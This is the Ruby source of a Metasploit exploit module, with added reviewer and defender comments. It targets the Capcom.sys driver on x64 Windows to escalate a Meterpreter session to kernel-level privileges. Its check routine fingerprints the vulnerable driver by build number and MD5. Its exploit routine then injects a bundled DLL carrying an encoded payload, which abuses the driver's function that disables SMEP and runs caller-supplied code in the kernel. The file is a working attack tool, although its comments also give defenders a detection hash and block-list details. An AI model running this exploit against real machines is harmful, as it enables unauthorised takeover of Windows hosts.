GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege-escalation module for the Capcom.sys kernel driver.
#
# The module does not exploit the driver in Ruby: `exploit` hands an encoded
# payload to a prebuilt DLL (capcom_sys_exec.x64.dll from the framework data
# directory) via the reflective DLL injection mixin. The Ruby side is
# responsible for the pre-flight checks (Windows version, architecture,
# session bitness) and for fingerprinting the loaded driver by MD5.
#
# Defender notes: the driver is only usable on x64 hosts, the module refuses
# Windows builds newer than 10.0.22000.194 (driver block list), and the MD5
# in `check` identifies the exact Capcom.sys build this module targets, so it
# doubles as a detection indicator for the vulnerable driver being present.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  # NOTE(review): AutoCheck is prepended so the framework runs `check` before
  # `exploit`; `exploit` below also calls `check` itself — confirm this
  # second call is intended (it re-enumerates drivers and re-hashes the file).
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata with the framework.
  #
  # @param info [Hash] base module info supplied by the framework, merged via
  #   update_info with the declarative metadata below.
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
          'Description' => %q{
            This module abuses the Capcom.sys kernel driver's function that allows for an
            arbitrary function to be executed in the kernel from user land. This function
            purposely disables SMEP prior to invoking a function given by the caller.
            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'TheWack0lian', # Issue discovery
            'OJ Reeves' # exploit and msf module
          ],
          # x64 only: the injected DLL shipped with the framework is an x64 build.
          'Arch' => [ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
          ],
          # The encoded payload must fit in 4096 bytes; NOP sleds are disabled.
          'Payload' => {
            'Space' => 4096,
            'DisableNops' => true
          },
          'References' => [
            ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
          ],
          'DisclosureDate' => '1999-01-01', # non-vuln exploit date
          'DefaultTarget' => 0,
          # Meterpreter commands used by `check`: stdapi_fs_md5 (driver file
          # hash) and stdapi_sys_config_driver_list (getdrivers enumeration).
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_fs_md5
                stdapi_sys_config_driver_list
              ]
            }
          },
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
  end

  # Determines whether the session host looks exploitable.
  #
  # Returns Unknown for non-Windows sessions, pre-Windows 7 builds and server
  # SKUs; Safe for builds newer than 10.0.22000.194 (block list), non-x64
  # hosts, and hosts where no loaded driver named capcom.sys matches the
  # expected MD5; Appears only when a loaded capcom.sys has the expected hash.
  #
  # @return [Exploit::CheckCode]
  def check
    return Exploit::CheckCode::Unknown unless session.platform == 'windows'

    version = get_version_info
    # Nothing older than Windows 7 and no server editions are supported here.
    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
      return Exploit::CheckCode::Unknown
    end

    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys
    if version.build_number > Rex::Version.new('10.0.22000.194')
      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
    end

    # The host itself must be x64; session bitness (WOW64) is checked in `exploit`.
    if sysinfo['Architecture'] != ARCH_X64
      return Exploit::CheckCode::Safe
    end

    # Validate that the driver has been loaded and that
    # the version is the same as the one expected
    client.sys.config.getdrivers.each do |d|
      next unless d[:basename].downcase == 'capcom.sys'

      # MD5 of the specific Capcom.sys build this module expects. A loaded
      # capcom.sys with any other hash falls through to Safe below, so this
      # value is both the module's fingerprint and a usable detection indicator.
      expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
      # md5 returns raw bytes; compare in lowercase hex with no separator.
      target_checksum = client.fs.file.md5(d[:filename])

      if expected_checksum == Rex::Text.to_hex(target_checksum, '')
        return Exploit::CheckCode::Appears
      end
    end

    # Driver not loaded, or loaded with an unexpected hash.
    return Exploit::CheckCode::Safe
  end

  # Runs the pre-flight checks and injects the bundled DLL with the encoded
  # payload. Each `fail_with` aborts the run with the given failure reason.
  def exploit
    # Nothing to escalate if the session is already SYSTEM.
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    # NOTE(review): this `==` relies on CheckCode comparing by code, since the
    # block-list branch of `check` returns Safe with a custom reason string —
    # confirm that a Safe-with-message still matches plain Safe here.
    check_result = check
    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    if sysinfo['Architecture'] == ARCH_X64
      # An x86 (WOW64) session on an x64 host cannot load the x64 DLL.
      if session.arch == ARCH_X86
        fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')
      end

      # The selected target's first architecture must agree with the host.
      if target.arch.first == ARCH_X86
        fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
      end
    end

    # The DLL (from the framework data directory) receives the encoded payload;
    # all kernel interaction happens inside it, not in this module.
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),
      encoded_payload
    )

    # execute_dll does not report whether the payload ran; success is only
    # observable when a new session arrives.
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end